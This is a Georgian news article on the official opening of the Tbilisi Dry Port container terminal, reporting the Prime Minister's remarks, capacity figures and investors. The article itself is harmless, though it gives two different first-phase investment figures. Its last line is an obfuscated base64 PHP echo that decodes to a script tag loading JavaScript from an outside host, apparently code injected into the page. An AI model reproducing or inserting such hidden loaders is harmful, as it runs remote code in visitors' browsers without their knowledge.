gorgia
jaluzi

"თბილისის მშრალი პორტი" (Tbilisi Dry Port), რომელიც 1 თვეა სატესტო რეჟიმში მუშაობს, დღეს 3 ივნისს ოფიციალურად გაიხსნა.

თბილისის მშრალი პორტი, რეგიონში პირველი თანამედროვე სარკინიგზო საკონტეინერო და სატვირთო ტერმინალი, ოფიციალურად იხსნება და სრულფასოვან ფუნქციონირებას იწყებს. როგორც პრემიერ-მინისტრმა ირაკლი კობახიძემ გახსნის ღონისძიებაზე განაცხადა, ეს "უმნიშვნელოვანესი სტრატეგიული ობიექტი" საკვანძო როლს შეასრულებს კავკასიისა და ცენტრალური აზიის რეგიონის სავაჭრო ნაკადების გაძლიერებაში.

მისი თქმით, თბილისის მშრალი პორტი 28.5 ჰექტარ ტერიტორიაზე 3 ფაზად შენდება. უკვე ამოქმედდა პირველი ფაზა, რომელშიც 21 მილიონი აშშ დოლარის ინვესტიცია ჩაიდო. ამ ფაზის დასრულების შემდეგ, პორტს წელიწადში 100 000 კონტეინერის დამუშავება შეეძლება. დარჩენილი ფაზების დასრულების შემდეგ კი მისი სიმძლავრე 200 000 კონტეინერამდე გაიზრდება.

„ეს არის უმნიშვნელოვანესი სტრატეგიული ობიექტი, რომელიც შეემატა ჩვენს ქვეყანას და ეს ობიექტი ჩვენს საზღვაო პორტებთან ერთად, როგორიც არის ფოთის, ბათუმის და შემდეგ უკვე ანაკლიის პორტები, საკვანძო როლს შეასრულებს კავკასიისა და ცენტრალური აზიის რეგიონის სავაჭრო ნაკადების გაძლიერებაში“, — განაცხადა კობახიძემ

ირაკლი კობახიძის განცხადებით, თბილისის მშრალი პორტი არა მხოლოდ ქართულ პორტებს მოემსახურება, არამედ საერთაშორისო საზღვაო ხაზებისთვის საკონტეინერო ჰაბისა და დეპოს ფუნქციასაც შეასრულებს. ეს მნიშვნელოვნად გააუმჯობესებს კონტეინერების დამუშავებისა და გადაადგილების ოპერაციებს, განსაკუთრებით კი ჩინეთიდან და შორეული აღმოსავლეთიდან „შუა დერეფნის“ მეშვეობით გადაზიდული ტვირთებისთვის.

მან ხაზი გაუსვა მშრალი პორტის სტრატეგიულ მდებარეობას — მას აქვს პირდაპირი წვდომა საერთაშორისო ავტომაგისტრალებთან, კავშირი ეროვნულ სარკინიგზო ქსელთან, სიახლოვე სომხეთისა და აზერბაიჯანის საზღვრებთან და თბილისის საერთაშორისო აეროპორტთან, რაც მას რეგიონის ერთ-ერთ ყველაზე ეფექტურ ლოგისტიკურ ცენტრად აქცევს.

კობახიძემ მადლობა გადაუხადა ინვესტორებს – „აბუ-დაბი პორტების ჯგუფს“, ნორვეგიულ „ვილჰელმსენ პორტ სერვისს“ და ადგილობრივ კომპანია „ინვეკოს“, ასევე, ყველა ინჟინერსა თუ მშენებელს, ვინც პროექტის განხორციელებაში მიიღო მონაწილეობა.

„ეს პროექტი დიდი წინგადადგმული ნაბიჯია ჩვენი ქვეყნისთვის, მისი ეკონომიკური განვითარების გზაზე, რეგიონული ინფრასტრუქტურის განვითარებისთვის. ეს ყველაფერი კიდევ უფრო გააძლიერებს ჩვენი ქვეყნის დაკავშირებადობის და სატრანზიტო ფუნქციას, უზრუნველყოფს ჩვენი ქვეყნის გადაქცევას რეგიონის ჰაბად“, — განაცხადა პრემიერმა.

შეგახსენებთ, გასულ წელს არაბული „აბუ დაბი პორტს გრუპი“ (AD Ports Group) „თბილისის მშრალი პორტის“ 60%-იანი წილის მფლობელი და მთავარი პარტნიორი გახდა. პროექტის პირველი ფაზის ფარგლებში ინვესტიციამ 20 მლნ დოლარი შეადგინა.

136
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");